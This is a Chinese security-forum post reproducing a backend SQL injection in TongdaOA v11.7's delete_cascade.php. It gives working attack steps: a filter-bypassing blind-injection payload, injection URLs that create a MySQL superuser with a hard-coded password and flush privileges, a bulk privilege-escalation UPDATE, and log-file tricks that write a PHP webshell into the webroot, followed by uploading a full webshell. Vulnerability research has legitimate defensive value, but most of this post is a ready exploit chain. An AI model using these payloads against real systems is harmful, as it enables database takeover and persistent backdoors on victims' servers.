问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
TongdaOA v11.7 delete_cascade.php 后台SQL注入
# TongdaOA v11.7 delete_cascade.php 后台SQL注入 ## 漏洞描述 TongdaOA v11.7后台存在SQL注入,可通过此漏洞写入恶意后门文件攻击目标服务器 ## 漏洞影响 TongdaOA v11.7 ##...
TongdaOA v11.7 delete\_cascade.php 后台SQL注入 ========================================== 漏洞描述 ---- TongdaOA v11.7后台存在SQL注入,可通过此漏洞写入恶意后门文件攻击目标服务器 漏洞影响 ---- TongdaOA v11.7 环境搭建 ---- 环境地址: <https://cdndown.tongda2000.com/oa/2019/TDOA11.7.exe> 漏洞复现 ---- 在 `general/hr/manage/query/delete_cascade.php` 文件中 ![img](https://shs3.b.qianxin.com/butian_public/f738952298df777fbf400a45c03a7b4b12482c2900a3e.jpg) 首先判断`$condition_cascade`是否为空,如果不为空,则将其中的`\'`替换为`'`。为什么要这样替换呢,主要是因为V11.7版本中,注册变量时考虑了安全问题,将用户输入的字符用`addslashes`函数进行保护,如下: `inc/common.inc.php` 代码 ![img](https://shs3.b.qianxin.com/butian_public/f861705586d03c90e27157a3c2ad7ee771adddd586dcc.jpg) 使用盲注对SQL注入进行测试 ![img](https://shs3.b.qianxin.com/butian_public/f8371993e78b768dec22cb5881026d7d4f642d95e4d8e.jpg) 触发了TongdaOA的SQL注入拦截 `inc/conn.php`文件中找到过滤机制如下: ![img](https://shs3.b.qianxin.com/butian_public/f5655289b3612445d29babdd2601c9c21e67ef538214b.jpg) 其过滤了一些字符,但是并非无法绕过,盲注的核心是:`substr、if`等函数,均未被过滤,那么只要构造MySQL报错即可配合`if`函数进行盲注了,翻看局外人师傅在补天白帽大会上的分享,发现`power(9999,99)`也可以使数据库报错,所以构造语句: ```sql select if((substr(user(),1,1)='r'),1,power(9999,99)) # 当字符相等时,不报错,错误时报错 ``` ![img](https://shs3.b.qianxin.com/butian_public/f195631a1da634ed7cc398a98bc1fc44ed544fd992c32.jpg) ![img](https://shs3.b.qianxin.com/butian_public/f4685623e094a487e430c22da82ec63beeb70f8d3774c.jpg) 添加SQL数据库用户 ```sql grant all privileges ON mysql.* TO 'peiqi'@'%' IDENTIFIED BY 'peiqiABC@123' WITH GRANT OPTION ``` 访问 `[http://xxx.xxx.xxx.xxx/general/hr/manage/query/delete\_cascade.php?condition\_cascade=grant](http://xxx.xxx.xxx.xxx/general/hr/manage/query/delete_cascade.php?condition_cascade=grant) all privileges ON mysql. *TO 'peiqi'@'%' IDENTIFIED BY 'peiqiABC@123' WITH GRANT OPTION* 进入 `Myoa/mysql5/bin` 目录 执行 `mysql -upeiqi -p` 输入密码查询所有用户 ![img](https://shs3.b.qianxin.com/butian_public/f278896d4d36e4aaf9df43f201e55e1fa34295aa02b37.jpg) 发现成功执行添加一个账户 然后该用户是对mysql数据库拥有所有权限的,然后给自己加权限: ```sql UPDATE `mysql`.`user` SET `Password` = '*FBCFBB73CF21D4F464A95E775B40AF27A679CD2D', `Select_priv` = 'Y', `Insert_priv` = 'Y', `Update_priv` = 'Y', `Delete_priv` = 'Y', `Create_priv` = 'Y', `Drop_priv` = 'Y', `Reload_priv` = 'Y', `Shutdown_priv` = 'Y', `Process_priv` = 'Y', `File_priv` = 'Y', `Grant_priv` = 'Y', `References_priv` = 'Y', `Index_priv` = 'Y', `Alter_priv` = 'Y', `Show_db_priv` = 'Y', `Super_priv` = 'Y', `Create_tmp_table_priv` = 'Y', `Lock_tables_priv` = 'Y', `Execute_priv` = 'Y', `Repl_slave_priv` = 'Y', `Repl_client_priv` = 'Y', `Create_view_priv` = 'Y', `Show_view_priv` = 'Y', `Create_routine_priv` = 'Y', `Alter_routine_priv` = 'Y', `Create_user_priv` = 'Y', `Event_priv` = 'Y', `Trigger_priv` = 'Y', `Create_tablespace_priv` = 'Y', `ssl_type` = '', `ssl_cipher` = '', `x509_issuer` = '', `x509_subject` = '', `max_questions` = 0, `max_updates` = 0, `max_connections` = 0, `max_user_connections` = 0, `plugin` = 'mysql_native_password', `authentication_string` = '', `password_expired` = 'Y' WHERE `Host` = Cast('%' AS Binary(1)) AND `User` = Cast('peiqi' AS Binary(5)); ``` ![img](https://shs3.b.qianxin.com/butian_public/f797080e6dcd13e1dad2f6202ae221a64bbc89905cd5a.jpg) 然后用注入点刷新权限,因为该用户是没有刷新权限的权限的:`general/hr/manage/query/delete_cascade.php?condition_cascade=flush privileges;`这样就拥有了所有权限 ![img](https://shs3.b.qianxin.com/butian_public/f4296753c0eb8d73760eb938dc4aafe4dcbd2985ca6ab.jpg) 登录如果失败,执行 ```sql grant all privileges ON mysql.* TO 'peiqi'@'%' IDENTIFIED BY 'peiqiABC@123' WITH GRANT OPTION ``` 利用漏洞写shell ```sql # 查路径: select @@basedir; # F:\OA\mysql5\,那么web目录就是 F:/OA/webroot/ # 方法1: set global slow_query_log=on; set global slow_query_log_file='F:/OA/webroot/'; select '<?php phpinfo();?>' or sleep(11); # 方法2: set global general_log = on; set global general_log_file = 'F:/OA/webroot/'; select '<?php phpinfo();?>'; show variables like '%general%'; ``` 上传大马 ![img](https://shs3.b.qianxin.com/butian_public/f248021c16209d64c1c8d6ed2a0fb427b16a5ad60c57a.jpg)
发表于 2024-07-12 18:44:35
阅读 ( 962 )
分类:
OA产品
0 推荐
收藏
0 条评论
请先
登录
后评论
带头大哥
456 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!